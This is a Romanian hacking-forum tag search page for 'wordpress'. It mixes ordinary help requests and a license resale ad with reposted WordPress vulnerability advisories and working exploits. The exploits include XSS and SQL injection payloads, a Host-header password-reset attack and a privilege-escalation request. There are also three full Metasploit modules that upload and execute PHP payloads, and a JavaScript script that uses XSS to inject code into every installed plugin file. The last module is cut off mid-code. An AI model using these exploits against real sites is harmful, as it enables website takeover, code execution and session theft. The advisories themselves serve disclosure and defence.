Jump to content

Search the Community

Showing results for tags 'wordpress'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Cumparaturi online's Topics
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Cumparaturi online's Test
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Location


Interests


Biography


Location


Interests


Occupation

Found 75 results

  1. Programator Wordpress

    Caut pe cineva care are cunostinte pe wordpress ,pt a modifica o tema contra cost ,PM cu adresa skype
  2. WordPress User Login History plugin version 1.5.2 suffers from a cross site scripting vulnerability. Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/ Vendor: Er Faiyaz Alam Tested version: 1.5.2 CVE ID: CVE-2017-15867 ** CVE description ** Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php. ** Technical details ** The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the "> (%22%3E) expression and inject arbitrary HTML/JavaScript code. Example of the vulnerable code with the date_from parameter (line 21): <td><input readonly="readonly" autocomplete="off" placeholder="<?php _e("From", "user-login-history") ?>" id="date_from" name="date_from" value="<?php echo isset($_GET['date_from']) ? $_GET['date_from'] : "" ?>" class="textfield-bg"></td> ** Proof of Concept ** Example using the user_id parameter: http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E ** Solution ** Update to version 1.6. ** Timeline ** 15/10/2017: vendor contacted 15/10/2017: vendor acknowledgment 18/10/2017: fix pushed to GitHub 30/10/2017: fixed release available on WordPress Plugins Store. ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). ** References ** - WordPress-plugin-user-login-history GitHub : error log and xss and some minor improvements https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741 -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI) _________________________________________________________________________________________________________________________ Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler a l'expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d'alteration, Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci. This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you. # 0day.today [2017-11-01] # Source: 0day.today
  3. ==================================================== - Discovered by: Dawid Golunski (@dawid_golunski) - dawid[at]legalhackers.com - https://legalhackers.com - ExploitBox.io (@Exploit_Box) - CVE-2017-8295 - Release date: 03.05.2017 - Revision 1.0 - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day) II. BACKGROUND ------------------------- "WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites." https://en.wikipedia.org/wiki/WordPress III. INTRODUCTION ------------------------- Wordpress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such attack could lead to an attacker gaining unauthorised access to a victim's WordPress account. IV. DESCRIPTION ------------------------- The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner's account. This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function: ------[ wp-includes/pluggable.php ]------ ... if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; } ... ----------------------------------------- As we can see, Wordpress is using SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email. However, major web servers such as Apache by default set the SERVER_NAME variable using the hostname supplied by the client (within the HTTP_HOST header): https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname Because SERVER_NAME can be modified, an attacker could set it to an arbitrary domain of his choice e.g: attackers-mxserver.com which would result in Wordpress setting the $from_email to wordpress@attackers-mxserver.com and thus result in an outgoing email with From/Return-Path set to this malicious address. As to which e-mail header the attacker would be able to modify - From or Return-Path, it depends on the server environment. As can be read on http://php.net/manual/en/function.mail.php The From header sets also Return-Path under Windows. Depending on the configuration of the mail server, it may result in an email that gets sent to the victim WordPress user with such malicious From/Return-Path address set in the email headers. This could possibly allow the attacker to intercept the email containing the password reset link in some cases requiring user interaction as well as without user interaction. Some example scenarios include: * If attacker knows the email address of the victim user. They can perform a prior DoS attack on the victim's email account (e.g by sending multiple large files to exceed user's disk quota, or attacking the DNS server) in order to cause the password reset email to be rejected by the receiving server, or not reach the destination and thus get returned to the account on attacker's server * Some autoresponders might attach a copy of the email sent in the body of the auto-replied message * Sending multiple password reset emails to force the user to reply to the message to enquiry explanation for endless password reset emails. The reply containing the password link would then be sent to attacker. etc. V. PROOF OF CONCEPT ------------------------- If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper: ------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of: #!/bin/bash cat > /tmp/outgoing-email VI. BUSINESS IMPACT ------------------------- Upon a successfull exploitation, attacker may be able to reset user's password and gain unauthorized access to their WordPress account. VII. SYSTEMS AFFECTED ------------------------- All WordPress versions up to the latest 4.7.4 VIII. SOLUTION ------------------------- No official solution available. As a temporary solution users can enable UseCanonicalName to enforce static SERVER_NAME value https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname This issue was first reported to WordPress security team multiple times, with the first report sent in July 2016. As there has been no progress in this case , this advisory is finally released to the public without an official patch. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io Vendor site: https://wordpress.org http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname http://php.net/manual/en/function.mail.php https://tools.ietf.org/html/rfc5321 X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io Thanks to BeyondSecurity for help with contacting the vendor. XI. REVISION HISTORY ------------------------- 03.05.2017 - Advisory released, rev. 1 XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS ------------------------- ExploitBox.io is coming soon. Subscribe at https://ExploitBox.io to stay updated and be there for the launch. XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
  4. CODE : # # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. # # # # # Source/Sursa: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
  5. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  6. Salut popor, Vreau să-mi iau domeniu și hosting de freehostingeu.com și mă interesează să aflu dacă pot cumva redirecţiona traficul de pe blogul meu pe wordpress pe noul domeniu?! Mulțumesc!
  7. Salut, puteti sa imi recomandati un player web pentru wordpress care sa preia link-urile de pe youtube si sa le redea unul dupa altul... sa semene ca un fel de televiziune live daca intelegeti ce vreau sa spun... Stiu ca se poate face playlist in youtube si incorpora link-ul, dar nu vreau ca omul sa aiba posibilitatea sa aleaga ce vrea el si sa se plimbe prin continut. Pentru orice alte detalii pe care le doriti, intrebati-ma. Multumesc anticipat!
  8. Hosting pe WordPress?

    Salutare. Vad multe teme frumoase pentru hosting pentru platforma WordPress. Momentan folosesc whmcs dar as dori sa întreb: ce plugin este necesar pentru Wordpress ca sa pot face ceva asemănător cu whmcs (sa se poată face comenzi, tickete support, etc.)? Bănuiesc că se poate din moment ce exista sute de teme dedicate hostingului pentru wp.
  9. Programator wordpress

    Salut, Am un plugin de wp pe care as dori sa-l modifc/updatez, caut o persoana capabila sa se ocupe cu dezvoltare pe partea de wordpress/woocommerce. cx.dany [@] yahoo.com Multumesc.
  10. /// Se poate inchide.
  11. Un tutorial de pe udemy.com pentru ce-i incepatori , e gratuit. Dupa cum puteti vedea este vorba despre cum sa iti setezi hostu si sa iti instalezi wordpress . (imi cer scuze daca nu am postat unde trebuie , e primul post sper sa nu fie si ultimu' ) . Numa' bine tuturor. Web Hosting Set Up and WordPress Installation For Beginners
  12. Problema Wordpress .

    Salut, am o problema pe care ma chinui sa o rezolv de 2 zile. Mi-am facut un site de filme online ( deocamdata e local) si cand postez un film imi apare tot continultu postului pe pagina. Eu vreau sa fac sa apara numele filmului cu poza si cand dau click sa ma duca la tot postul unde e si filmul in sine. Cum imi arata mie : hosting immagini Cum vreau sa apara: free image hosting Va multumesc !
  13. WPTouch (Enterprise Version) A complete mobile solution for wordpress. http://www.wptouch.com/pricing/ ENTERPRISE $349 Supported WordPress Sites Unlimited scriptul are updating 1 an. fara updating e pe viata. 100 euro . paypal/btc astept pm.
  14. # Exploit Title: WordPress WP Membership plugin [Privilege escalation] # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # CVE: CVE-2015-4038 1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website. 2 Proof of Concept * Login as regular user * Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 3 Actions taken after discovery Vendor was informed on 2015/05/19. 4 Solution No official solution yet exists. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpmembership-escalate.txt
  15. Advisory ID: HTB23257 Product: WP Photo Album Plus WordPress Plugin Vendor: J.N. Breetvelt Vulnerable Version(s): 6.1.2 and probably prior Tested Version: 6.1.2 Advisory Publication: April 29, 2015 [without technical details] Vendor Notification: April 29, 2015 Vendor Patch: April 29, 2015 Public Disclosure: May 20, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3647 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website. The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface. A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images: <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main"> <input type="hidden" name="action" value='wppa'> <input type="hidden" name="wppa-action" value='do-comment'> <input type="hidden" name="photo-id" value='2'> <input type="hidden" name="comment" value='1'> <input type="hidden" name="moccur" value='1'> <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="submit" id="btn"> </form> The code will be automatically executed, when the administrator visits one of the following pages: http://[host]/wp-admin/admin.php?page=wppa_manage_comments http://[host]/wp-admin/admin.php?page=wppa_moderate_photos ----------------------------------------------------------------------------------------------- Solution: Update to WP Photo Album Plus 6.1.3 More Information: https://wordpress.org/plugins/wp-photo-album-plus/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin. [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
  16. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end Source
  17. Advisory ID: HTB23255 Product: eShop WordPress plugin Vendor: Rich Pedley Vulnerable Version(s): 6.3.11 and probably prior Tested Version: 6.3.11 Advisory Publication: April 15, 2015 [without technical details] Vendor Notification: April 15, 2015 Public Disclosure: May 6, 2015 Vulnerability Type: Code Injection [CWE-94] CVE Reference: CVE-2015-3421 Risk Level: Medium CVSSv2 Base Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered security vulnerability in eShop WordPress Plugin, which can be exploited by remote attacker to overwrite arbitrary PHP variables within the context of the vulnerable application. The vulnerability exists due to insufficient validation of user-supplied input in "eshopcart" HTTP cookie. Successful exploitation of this vulnerability may potentially result in arbitrary PHP code execution (RCE). Often such type of vulnerabilities lead to RCE, however in this case we can only overwrite string variables within the scope of 'eshop_checkout()' function in '/wp-content/plugins/eshop/checkout.php' file. This reduces our current vectors of exploitation to Full Path Disclosure and Cross-Site Scripting. Below is a simple PoC that overwrites contents of the "wpdb" PHP variable, which causes an error in code and discloses full installation path: GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=wpdb%3d1%7C; Another PoC triggers the XSS vector and executes JS pop-up box displaying "ImmuniWeb": GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=phone%3dsdfg'"><script>alert(/ImmuniWeb/)</script> ----------------------------------------------------------------------------------------------- Solution: Disclosure timeline: 2015-04-15 Vendor Alerted via contact form and thread in support forum, no reply. 2015-04-29 Vendor Alerted via contact form and emails, no reply. 2015-05-05 Fix Requested via contact form and emails, no reply. 2015-05-06 Public disclosure. Currently we are not aware of any official solution for this vulnerability. ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23255 - https://www.htbridge.com/advisory/HTB23255 - Arbitrary Variable Overwrite in eShop WordPress Plugin. [2] eShop WordPress Plugin - http://quirm.net/ - eShop is an accessible shopping cart plugin for WordPress, packed with various features. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
  18. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator. /* Author: @evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ¯\_(?)_/¯ Reference: [url]http://research.evex.pw/?vuln=14[/url] Enjoy. */ //Installed Plugins Page plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php'; //Inject "XSS" Div jQuery('body').append('<div id="xss" ></div>'); xss_div = jQuery('#xss'); xss_div.hide(); //Get Installed Plugins Page Source and Append it to "XSS" Div jQuery.ajax({ url: plugins, type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); } }); //Put All Plugins Edit URL in Array plugins_edit = [ ]; xss_div.find('a').each(function () { if (jQuery(this).attr('href').indexOf('?file=') != - 1) { plugins_edit.push(jQuery(this).attr('href')); } }); //Inject Payload for (var i = 0; i < plugins_edit.length; i++) { jQuery.ajax({ url: plugins_edit[i], type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1]; old_code = jQuery('form#template div textarea#newcontent') [0].value; payload = '<?php phpinfo(); ?>'; new_code = payload + '\n' + old_code; file = plugins_edit[i].split('file=') [1]; jQuery.ajax({ url: plugins_edit[i], type: 'POST', data: { '_wpnonce': _wpnonce, 'newcontent': new_code, 'action': 'update', 'file': file, 'submit': 'Update File' }, async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) { // Passed, this is up to you ( skiddies Filter ) injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url] throw new Error(''); } } }); } }); } Source : WordPress 4.2.1 XSS / Code Execution
  19. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote code execution. This module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server. }, 'Author' => [ 'g0blin', # Vulnerability Discovery, initial msf module 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '7830'], ['URL', 'https://research.g0blin.co.uk/g0blin-00036/'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]], 'DisclosureDate' => 'Mar 09 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3') end def exploit php_page_name = rand_text_alpha(5 + rand(5)) + '.php' data = Rex::MIME::Message.new data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /#{php_page_name}/ print_good("#{peer} - Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, "#{peer} - Server did not answer") end print_status("#{peer} - Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt
  20. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress InBoundio Marketing PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version 2.0. It allows to upload arbitrary php files and get remote code execution. This module has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on Ubuntu 14.04 Server. }, 'Author' => [ 'KedAns-Dz', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '36478'], ['OSVDB', '119890'], ['WPVDB', '7864'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['InBoundio Marketing 2.0', {}]], 'DisclosureDate' => 'Mar 24 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('inboundio-marketing') end def exploit php_page_name = rand_text_alpha(8 + rand(8)) + '.php' data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body.include?(php_page_name) print_good("#{peer} - Our payload is at: #{php_page_name}.") 